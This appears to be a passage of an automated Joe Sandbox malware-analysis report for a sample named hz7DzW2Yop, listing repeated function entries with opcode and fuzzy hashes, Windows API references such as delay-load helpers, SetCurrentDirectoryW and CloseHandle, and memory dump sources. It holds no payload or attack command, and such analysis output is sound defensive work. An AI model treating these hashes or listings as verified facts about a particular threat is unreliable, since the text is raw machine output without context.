                                                                                                  • Opcode ID: 6db2ccb2c9010a980cc9e2e0f7f2cab4d6ff1d719cf8a600da2a9293db66d366
                                                                                                  • Instruction ID: 4ab6c4354fa60ee8d0f0c0aafdc9ea5f7d0f3f37e8a3ba589a9469897d442714
                                                                                                  • Opcode Fuzzy Hash: 6db2ccb2c9010a980cc9e2e0f7f2cab4d6ff1d719cf8a600da2a9293db66d366
                                                                                                  • Instruction Fuzzy Hash: 5CA011E23AC00ABC300822222C0ACBB022CE8C0B20330882EFC03C0080A88028822830
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
  • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
  • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 869717c3fab26352077c513ec985c6596ed7de2e5c5b90d95046f78cf28d5585
• Instruction ID: 4ab6c4354fa60ee8d0f0c0aafdc9ea5f7d0f3f37e8a3ba589a9469897d442714
• Opcode Fuzzy Hash: 869717c3fab26352077c513ec985c6596ed7de2e5c5b90d95046f78cf28d5585
• Instruction Fuzzy Hash: 5CA011E23AC00ABC300822222C0ACBB022CE8C0B20330882EFC03C0080A88028822830
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0091E3FC
  • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
  • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 3bd4d69905668488fd14b7332fefc416c84d4e7ef9e58483a78c03a44f04e4b9
• Instruction ID: fdbd7c75ef314d2478407ec5e952ed0cb60dfbd3ccb1715bb756f2ee87dff40e
• Opcode Fuzzy Hash: 3bd4d69905668488fd14b7332fefc416c84d4e7ef9e58483a78c03a44f04e4b9
• Instruction Fuzzy Hash: 22A001E63A956A7D310866516D07DBB122DC8C1B29730996EFC25A5485AC8418861973
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0091E3FC
  • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
  • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: da3fb50241cc7e66e6639fb0cdce2575ee86d9d4a6583085dd0ee279eb00ec01
• Instruction ID: d50e3e184712c1010c4023df440df97c86c2a41ae055a5342d86fb52645e969e
• Opcode Fuzzy Hash: da3fb50241cc7e66e6639fb0cdce2575ee86d9d4a6583085dd0ee279eb00ec01
• Instruction Fuzzy Hash: 9AA011E23AC02ABC300822002C03CBB022CC8C0B28330882EFC22A0080A88008820833
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0091E3FC
  • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
  • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 09f1b4acc7138acf06f8b56cfa773423e9821006e4d9b4d0ac9a88f43a92824c
• Instruction ID: d50e3e184712c1010c4023df440df97c86c2a41ae055a5342d86fb52645e969e
• Opcode Fuzzy Hash: 09f1b4acc7138acf06f8b56cfa773423e9821006e4d9b4d0ac9a88f43a92824c
• Instruction Fuzzy Hash: 9AA011E23AC02ABC300822002C03CBB022CC8C0B28330882EFC22A0080A88008820833
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0091E3FC
  • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
  • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 87b043840bccf8d419c48135c9b91d602ea162d30e7752f025b60efd79ea1da3
• Instruction ID: d50e3e184712c1010c4023df440df97c86c2a41ae055a5342d86fb52645e969e
• Opcode Fuzzy Hash: 87b043840bccf8d419c48135c9b91d602ea162d30e7752f025b60efd79ea1da3
• Instruction Fuzzy Hash: 9AA011E23AC02ABC300822002C03CBB022CC8C0B28330882EFC22A0080A88008820833
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0091E3FC
  • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
  • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: f7b6bca9f80646e469956902cbbd4fc392ccaad9d8af98390550622e6635a8c4
• Instruction ID: d50e3e184712c1010c4023df440df97c86c2a41ae055a5342d86fb52645e969e
• Opcode Fuzzy Hash: f7b6bca9f80646e469956902cbbd4fc392ccaad9d8af98390550622e6635a8c4
• Instruction Fuzzy Hash: 9AA011E23AC02ABC300822002C03CBB022CC8C0B28330882EFC22A0080A88008820833
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0091E3FC
  • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
  • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: b1058520ebffd7b1138169d2615fdf5d0b1956667621c2c28441c9849618e4f1
• Instruction ID: d50e3e184712c1010c4023df440df97c86c2a41ae055a5342d86fb52645e969e
• Opcode Fuzzy Hash: b1058520ebffd7b1138169d2615fdf5d0b1956667621c2c28441c9849618e4f1
• Instruction Fuzzy Hash: 9AA011E23AC02ABC300822002C03CBB022CC8C0B28330882EFC22A0080A88008820833
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0091E580
  • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
  • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 6c13a0fd69308af765ff6bd595fcd641c3aa409c31bb872c6f83e930da40de71
• Instruction ID: c7208ca6a5fb736802fc054223e380d8efc27b4e01bf5db1c297f171e16f6dbb
• Opcode Fuzzy Hash: 6c13a0fd69308af765ff6bd595fcd641c3aa409c31bb872c6f83e930da40de71
• Instruction Fuzzy Hash: 96A011C2BA820ABC300822A02C03CBB022EC8C0B2C330882EFC02A0080A8800C820830
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0091E580
  • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
  • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: e026a58d4084fedfc52673fef21426219d3bf037cf554f4dd0fea8f6b0187cf2
• Instruction ID: c7208ca6a5fb736802fc054223e380d8efc27b4e01bf5db1c297f171e16f6dbb
• Opcode Fuzzy Hash: e026a58d4084fedfc52673fef21426219d3bf037cf554f4dd0fea8f6b0187cf2
• Instruction Fuzzy Hash: 96A011C2BA820ABC300822A02C03CBB022EC8C0B2C330882EFC02A0080A8800C820830
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E51F
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 3948c8cb0670576adc49fc225a73b839508d7eb16439ab5b77dd0e7149300273
                                                                                                  • Instruction ID: 287aa3b94e597aba1c2c8d04ffd2033efc9959b779afa3ed5fd2e47620da2628
                                                                                                  • Opcode Fuzzy Hash: 3948c8cb0670576adc49fc225a73b839508d7eb16439ab5b77dd0e7149300273
                                                                                                  • Instruction Fuzzy Hash: 12A011C23A880ABC300822002C03CBB022EC8C2F28330882EFC0280080A8800C820A30
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E51F
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: d22620aa065b17bc5e5b12edfe84bcf40c257864b84bfdcd53ed3e40fbdeb004
                                                                                                  • Instruction ID: 287aa3b94e597aba1c2c8d04ffd2033efc9959b779afa3ed5fd2e47620da2628
                                                                                                  • Opcode Fuzzy Hash: d22620aa065b17bc5e5b12edfe84bcf40c257864b84bfdcd53ed3e40fbdeb004
                                                                                                  • Instruction Fuzzy Hash: 12A011C23A880ABC300822002C03CBB022EC8C2F28330882EFC0280080A8800C820A30
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E51F
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: b34aba33af429b463a3cdca8cf05a0b6931b2a06325daa764bc406310c272758
                                                                                                  • Instruction ID: 287aa3b94e597aba1c2c8d04ffd2033efc9959b779afa3ed5fd2e47620da2628
                                                                                                  • Opcode Fuzzy Hash: b34aba33af429b463a3cdca8cf05a0b6931b2a06325daa764bc406310c272758
                                                                                                  • Instruction Fuzzy Hash: 12A011C23A880ABC300822002C03CBB022EC8C2F28330882EFC0280080A8800C820A30
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E580
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 5b68ae2c7fc0fba89c7ab6e413689fe92ec7e0abe1db0988ba7e3c28ba376365
                                                                                                  • Instruction ID: 47a464e1ff6c46d7ebd26af5b40b1b4a9dbdc3d5b1acfcffcfa2dafb44945d29
                                                                                                  • Opcode Fuzzy Hash: 5b68ae2c7fc0fba89c7ab6e413689fe92ec7e0abe1db0988ba7e3c28ba376365
                                                                                                  • Instruction Fuzzy Hash: E2A011C2BA820A3C300822A02C03CBB022EC8C0B2E3308A2EFC00A0080A8800C820830
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E51F
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 060732dbc78263ea5a0773dfd0939096e52a2aa5a2c81c24e279fc830d085b4b
                                                                                                  • Instruction ID: 287aa3b94e597aba1c2c8d04ffd2033efc9959b779afa3ed5fd2e47620da2628
                                                                                                  • Opcode Fuzzy Hash: 060732dbc78263ea5a0773dfd0939096e52a2aa5a2c81c24e279fc830d085b4b
                                                                                                  • Instruction Fuzzy Hash: 12A011C23A880ABC300822002C03CBB022EC8C2F28330882EFC0280080A8800C820A30
                                                                                                  APIs
                                                                                                  • SetEndOfFile.KERNELBASE(?,0090903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00909F0C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File
                                                                                                  • String ID:
                                                                                                  • API String ID: 749574446-0
                                                                                                  • Opcode ID: f9a5b4d4b09f9b8e1334e6d2de488d7559b94be56cb44e4991fb163f2e1ee266
                                                                                                  • Instruction ID: bd9a01944b6aa0fd196469bb55bf9b48b3d24aa2616fdf5cb53e9bd8e12670c1
                                                                                                  • Opcode Fuzzy Hash: f9a5b4d4b09f9b8e1334e6d2de488d7559b94be56cb44e4991fb163f2e1ee266
                                                                                                  • Instruction Fuzzy Hash: 72A01230098009469D001B30CA0400C3710E7107C030041945006CA461C71644079A00
                                                                                                  APIs
                                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,0091AE72,C:\Users\user\Desktop,00000000,0094946A,00000006), ref: 0091AC08
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentDirectory
                                                                                                  • String ID:
                                                                                                  • API String ID: 1611563598-0
                                                                                                  • Opcode ID: 50a20f73fd350890931f21e46f65b58b57d6708107639114f19dafa24a449d31
                                                                                                  • Instruction ID: 2e79c926c055df57999d593ea389ccc051620a3b304056bbd5ff2fc0573ced2e
                                                                                                  • Opcode Fuzzy Hash: 50a20f73fd350890931f21e46f65b58b57d6708107639114f19dafa24a449d31
                                                                                                  • Instruction Fuzzy Hash: 75A011302082008B82000B328F0AA0EBAAAAFA2B20F00C028A00080030CB30C820BA00
                                                                                                  APIs
                                                                                                  • CloseHandle.KERNELBASE(000000FF,?,?,009095D6,?,?,?,?,?,00932641,000000FF), ref: 0090963B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
